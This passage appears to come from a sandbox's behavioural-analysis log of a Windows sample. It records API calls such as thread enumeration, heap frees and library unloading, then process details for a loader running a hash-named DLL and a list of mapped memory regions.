(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.433] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.435] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0099.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0137.636] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0137.659] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0141.016] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0141.335] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0141.336] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0141.336] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0141.336] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0141.336] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0141.336] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0141.337] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5870f0 | out: hHeap=0x570000) returned 1 [0141.337] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0141.337] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b290 | out: hHeap=0x570000) returned 1 [0141.337] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574fa0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574fe0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580810 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x575020 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x575060 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b530 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573fb0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b2c0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573eb0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x579900 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574090 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5725f0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573ef0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580180 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b2f0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5803b0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573f70 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ba20 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b410 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b320 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ba40 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b6b0 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ba80 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d00 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d20 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d40 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588250 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588210 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d60 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b590 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589340 | out: hHeap=0x570000) returned 1 [0141.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b3b0 | out: hHeap=0x570000) returned 1 [0141.339] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589240 | out: hHeap=0x570000) returned 1 [0141.339] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x579c90 | out: hHeap=0x570000) returned 1 [0141.339] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574860 | out: hHeap=0x570000) returned 1 [0141.340] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585ee0 | out: hHeap=0x570000) returned 1 [0141.340] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0141.341] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57aca0 | out: hHeap=0x570000) returned 1 [0141.341] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585b10 | out: hHeap=0x570000) returned 1 [0141.341] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0141.341] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0141.341] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0141.341] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0141.341] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0141.343] LocalFree (hMem=0x579770) returned 0x0 [0141.343] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0141.344] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0141.344] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5818f0 | out: hHeap=0x570000) returned 1 [0141.344] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584680 | out: hHeap=0x570000) returned 1 [0141.344] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0141.344] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0141.345] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0141.345] ExitProcess (uExitCode=0x0) [0141.345] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57c320 | out: hHeap=0x570000) returned 1 Thread: id = 14 os_tid = 0x13c4 Process: id = "4" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x2a26e000" os_pid = "0xf3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 451 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 452 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 453 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 454 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 455 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 456 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 457 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 458 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 459 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 460 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 461 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 463 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 464 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 465 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 466 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 467 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 469 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 470 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 471 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 472 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 473 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 474 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 475 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 476 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 477 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 478 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 479 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 480 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 481 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 482 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 483 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 484 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 485 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 486 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 487 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 488 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 489 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 490 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 491 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 492 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 493 start_va = 0xad0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 494 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 495 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 496 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 497 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 498 start_va = 0x4c0000 end_va = 0x57ffff monitored = 0 entry_point = 0x4e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 499 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 500 start_va = 0x1ed0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 501 start_va = 0x1fd0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 502 start_va = 0x21d0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 503 start_va = 0x25d0000 end_va = 0x2dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 504 start_va = 0x2dd0000 end_va = 0x3d9ffff monitored = 1 